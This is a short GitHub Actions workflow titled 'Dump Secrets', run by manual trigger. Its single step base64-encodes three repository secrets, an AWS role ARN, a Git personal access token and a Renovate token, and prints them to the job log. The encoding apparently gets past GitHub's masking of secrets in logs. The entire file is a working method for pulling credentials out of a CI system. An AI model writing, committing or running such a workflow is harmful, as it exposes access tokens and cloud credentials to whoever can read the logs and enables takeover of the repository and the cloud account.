name: Dump Secrets

on:
  workflow_dispatch:

permissions:
  contents: read

jobs:
  dump:
    runs-on: ubuntu-latest
    steps:
      - name: Dump all secrets
        run: |
          echo "AWS_ROLE_ARN: $(echo '${{ secrets.AWS_ROLE_ARN }}' | base64)"
          echo "GIT_PAT: $(echo '${{ secrets.GIT_PAT }}' | base64)"
          echo "RENOVATE_TOKEN: $(echo '${{ secrets.RENOVATE_TOKEN }}' | base64)"
